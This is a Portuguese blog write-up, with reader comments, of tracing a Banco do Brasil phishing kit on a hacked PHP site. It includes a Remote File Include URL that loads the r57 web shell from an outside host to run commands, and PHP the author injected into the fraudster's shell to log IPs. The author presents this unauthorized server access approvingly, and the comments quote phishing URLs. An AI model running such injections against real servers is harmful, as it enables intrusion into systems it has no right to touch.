Hackeando o Hacker – Investigando e contra-atacando um phishing

Primeiramente uma explicação sobre o título do artigo. O verbo “hackear” não existe oficialmente e o termo “hacker” aqui empregado não é o mais correto de ser utilizado, para mim hacker é quem possui conhecimentos avançados em computação e telecomunicações e utiliza esses conhecimentos em seu trabalho honesto para resolver problemas. Já no caso do artigo o termo mais correto seria “cracker” ou ainda fraudador, criminoso, bandido, estelionatário, etc. Enfim, utilizei esses termos por serem mais populares e causarem mais impacto.

Dito isso, vamos ao artigo em si.

Recebi um email cujo remetente se denominava “Banco do Brasil.” e o assunto “Informativo ao
Clientes Banco do Brasil!”. No corpo do e-mail havia um link chamado “[Recadastrando Cliente – BB]” que apontava para o endereço:

http://xxxxxx.ru/tpl/bancodobrasil.php#www.bancodobrasil.com.br/recadsatramento/cliente

Esse por sua vez redirecionou para outro site:

http://www.SITEORIGINAL.com.tw/admin/central/Auto-Atendimento/BancodoBrasil/

Estava aí mais um caso do nosso já conhecido phishing scam.

O site que abriu era uma cópia do site original do Banco do Brasil. Uma das diferenças do original é que o falso solicitava várias senhas diferentes, conforme pode ser visto na figura abaixo


Para obter mais informações sobre a fraude e uma possível identificação do autor, fiz uma pesquisa no site para tentar descobrir como o fraudador conseguiu obter o acesso não autorizado aos arquivos do mesmo.

Constatei que o site foi construído utilizando a linguagem de programação PHP. Uma técnica de invasão muito comum nesse tipo de site é a chamada “PHP Injection” (também conhecida como RFI - Remote File Include). Trata-se de uma técnica que permite executar arquivos remotamente no site inserindo na URL do mesmo uma outra URL contendo um script que permite executar comandos dentro das pastas do próprio site.

Para descobrir se o fraudador utilizou essa técnica, digitei a seguinte URL para ser executada no navegador:

http://www.SITEORIGINAL.com.tw/index.php?pg=http://LOCALDOSCRIPT/r57.txt?&cmd=ls

Através dessa URL é solicitado ao site original executar um arquivo que está em outro site. O arquivo “r57.txt” é um script que possui uma série de comandos para manipular pastas e arquivos do servidor onde está hospedado o site original, no exemplo em questão foi solicitado executar o comando “ls” (r57.txt?&cmd=ls) que lista todos os arquivos e pastas. Esse procedimento só funciona se o site alvo possuir uma falha de segurança específica da linguagem de programação PHP.

Após a execução dessa URL obtive êxito e consegui listar todos os arquivos e pastas do site original, ver imagem abaixo.


Na listagem foi possível descobrir a provável data que o site foi invadido. A data de modificação da pasta “admin” que foi onde o fraudador copiou o falso site era de 22 de julho, às 14:19 conforme a linha abaixo:

57491894 drwxr-xr-x 4 citycrea citycrea 4096 Jul 22 14:19 admin

Através do script “r57.txt” acessei as pastas “admin”, “central” e finalmente a “BancodoBrasil”.


Realizei uma cópia de todos os arquivos do site falso para análise.

Lendo os códigos-fontes dos arquivos copiados descobri que o arquivo “adesao.php” era o responsável por coletar todos os dados digitados pelas vítimas e salvá-los em um arquivo do tipo TXT chamado “PPx.txt”. Ao abrir o arquivo “PPx.txt” constatei que realmente já havia vários dados de agências, contas e senhas capturadas de possíveis vítimas.

Ainda analisando os demais arquivos, encontrei o arquivo “bt0165.php” que tinha como título “By Scra3zy > AoD > CMD > File List”. Tratava-se de um script shell para manipular arquivos e pastas no servidor invadido, parecido com o “r57.txt” que eu estava utilizando. O fraudador o utilizava para manipular os arquivos do seu falso site.

Sabendo disso e visando obter mais meios que pudessem identificar o autor da fraude, pensei em uma maneira de descobrir o endereço IP da conexão de Internet de onde o fraudador gerenciava todo esse sistema.

Como já mencionado, ele utilizava o arquivo “bt0165.php” para manipular os arquivos do falso site e tendo conhecimento que esse sistema utilizava a linguagem PHP, resolvi adicionar ao código-fonte do “bt0165.php” algumas linhas de código que realizariam a função de: toda vez que o sistema fosse acessado, registrar o dia e hora atual do servidor (com fuso horário GMT) e o endereço IP de onde partiu a conexão e salvar em um arquivo do tipo TXT no próprio site, só que em outra pasta e nome que não revelasse a verdadeira intenção do arquivo, para que assim o fraudador não pudesse encontrar facilmente.

Isso foi possível utilizando o script “r57.txt” para editar e inserir o seguinte código ao arquivo “bt0165.php” utilizado pelo fraudador:

$nowt = date('r');
$errors_file = "../error.txt";
$errors_handler = fopen($errors_file, 'a');
$errors_data = $nowt." - ".$_SERVER['REMOTE_ADDR']."\n";
fwrite($errors_handler, $errors_data);
fclose($errors_handler);

Com isso, se o fraudador acessasse o “bt0165.php” para manipular os arquivos do site, automaticamente iria ficar registrada a data e hora (com fuso horário GMT) do acesso e o endereço IP de onde partiu a conexão. E ficaria salvo no arquivo “.../admin/central/Auto-Atendimento/error.txt”.

Após algumas horas já foi possível perceber que o sistema deu certo, ao acessar o arquivo “error.txt” através do navegador, havia várias linhas com as conexões do fraudador conforme imagem abaixo.


Após três dias de monitoramento, identifiquei o comportamento do fraudador, que era de acessar várias vezes ao dia o arquivo “PPx.txt” para verificar se havia sido capturada alguma informação de conta bancária e caso positivo ele copiava o arquivo possivelmente para seu computador e depois utilizava o script “bt0165.php” para apagar o “PPx.txt”. Cada acesso ao “bt0165.php” ficou registrado no arquivo “error.txt”.

De posse do IP do “hacker” realizei uma varredura no seu micro, encontrei uma falha de segurança, invadi, obtive acesso root e formatei o HD dele. :) É brincadeira, não fiz isso, ele que é o bandido não eu.

O IP dele era dinâmico, porém de um provedor nacional, o que mostra que dá para chegar até ele através da quebra de sigilo telemático solicitando na justiça os logs de acesso.

Todas as informações encontradas nessa investigação repassei para as autoridades policiais responsáveis pelo combate ao crime cibernético. Lembrando que o método utilizado nesse artigo só é válido mediante prévio mandado judicial autorizando os procedimentos.

É isso aí, até a próxima!

28 comentários:

  1. ótimo blog! whitehat ownando :)
    pena que nem todos vestem esse chapéu. enfim, melhor pra nós que temos como passar o tempo 8)

    continue postando que eu continuo lendo :P

    uma duvida: qual seria o site pra denunciar esse tipo de fraude?

    ResponderExcluir
  2. Olá Anônimo,

    Obrigado pelo comentário, inclusive por causa dele tive a idéia de escrever um novo post, você pode conferir aí acima.

    Você tem razão, são poucas as pessoas que fazem isso, legal encontrar mais pessoas que se interessam pelo tema. O conhecimento do "underground" também pode ser utilizado para o bem né? :)

    Ah, respondi sua dúvida no final do post novo.

    Abraço!

    ResponderExcluir
  3. cara muito bom mesmo gostei do seu conteudo muito bom me ajudou muito nos meus estudos rsrsrsrsr
    continue assim que continuo aqui falou cara =D

    ResponderExcluir
  4. whitehat ownando , e isso me enche de orgulho!
    visto sim este chapeu e gostaria muito de conversar com você sobre suas postagens! trabalho com inclusão digital e movimentos ambientais!
    tenho algumas informações que podem ser importantes pra você tambem.
    acc por gentileza. dr_oliverkall[at]msn[dot]com

    Paz e luz!

    ResponderExcluir
  5. Estou me formando em Análise e Desenvolvimento de Sistemas pelo IFF-CAMPOS(RJ), seu blo é uma grande e importante fonte de conheçimento para mim, obrigado pelas suas contribuições e parabêns por mostrar ser merecedor do seu conheçimento.

    ResponderExcluir
  6. Hj várias pessoas receberam um email com o mesmo ataque.

    O interessante é que desta vez parece que servidor de email bancodobrasil.com.br ou o dns server foi hackeado pois a origem do email consta como sendo do dominio bancodobrasil.com.br (atendimento@bancodobrasil.com.br).

    Aqui está o link do proxy usado para redirecionar as vítimas:
    http://nationwideclarion.com/%20/http/bb.com.br?719436/742480.php?cli=XXXX

    Onde XXXX normalmente é o nome do cliente.

    ResponderExcluir
  7. eu queria ajuda para descobrir uma pessoa que me descriminou pelo facebook, e suspeito que seja fake, fui a delegacia, mas disseram que teria que descobrir quem é a pessoa. Preciso descobrir quem é.

    ResponderExcluir
  8. Cara muito bom as suas matérias descobri hoje seu site, esta de parabéns.
    Agora eu vi como é importante php!!!

    ResponderExcluir
  9. ola meu face foi hackeado e o facebook mandou um email informando.o ip e a operadora eh possivel descobrir com esses dados quem foi?

    ResponderExcluir
  10. Muto bom mesmo. Parabens. Poste um agora de como vc descobriu falhas no pc do camarada

    ResponderExcluir
  11. Cara, me mandaram um e-mail por atendimento@bancodobrasil.com.br

    cheguei nesta página...

    meus parabéns por fazer este trabalho cidadão!!
    Renato.

    ResponderExcluir
  12. olá amigo gostei do seu post, preciso de sua ajuda apesar de já ter denunciado a policia gostaria de obter informações sobre essa publicação. www.facebook.com/profile.php?id=100008061467836&fref=nf descobrir o IP desse safado...

    ResponderExcluir
  13. Boa noite !

    Parabéns pelo site e todo o material que está nele, muito bom mesmo.
    Eu tenho que fazer um trabalho sobre alguma invasão que aconteceu e foi registrada em algum lugar, essa do banco do brasil é muito boa. Queria saber se posso usar as imagens aqui postada, no meu trabalho.

    ResponderExcluir
  14. Contra atacar é a melhor forma de pegar essa galera, parabéns pelo trabalho

    ResponderExcluir
    Respostas
    1. com certeza.
      na verdade eles acham que só será mais uma vitima qe nao vai reagir e vai deixar para lá, por isso é tao importante denunciar

      Excluir
  15. Gostaria de saber se estou conversando com um scanner quê ser diz soldado americano no Afeganistão?

    ResponderExcluir
    Respostas
    1. Ele se diz soldado americano que está no Afeganistão estamos conversando varios meses mais estou desconfiada gostaria de uma resposta

      Excluir
  16. Gostaria de uma resposta

    ResponderExcluir
  17. Ele diz quê é rico mais já está pedindo dinheiro eu não dei o quê faço?

    ResponderExcluir
  18. Eu não estou acreditando nele postou várias fotos dele no Afeganistão sera scammer?

    ResponderExcluir
  19. Eu estou com problemas não sei se é scammer?

    ResponderExcluir
  20. Ele diz se eu mandar dinheiro ele vêm pára o Brasil

    ResponderExcluir
  21. Bom dia adorei!
    na verdade eu sofri um estelionato parecido, porém com o mercado Livre.
    Consegui rastrear o ip dos emails falsos enviados e os programas de localização apontaram para o Mato grosso. Vou levar essas informações hoje na policia, para dar sequencia no caso. Já descobri outros que ele fez no rio de janeiro também.

    Voce teria alguma sugestao de algo mais que eu possa fazer tambem para poder identificar o fraudador?

    ResponderExcluir
  22. Ola, otimo tópico.. preciso de ajuda com este site falso: http://cloud-idrecov2 .000webhostapp. com/ --- alguem pode me ajudar? roubaram meu iphone e estao tentando roubar meus dados

    ResponderExcluir
  23. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  24. Este comentário foi removido por um administrador do blog.

    ResponderExcluir

Related Posts Plugin for WordPress, Blogger...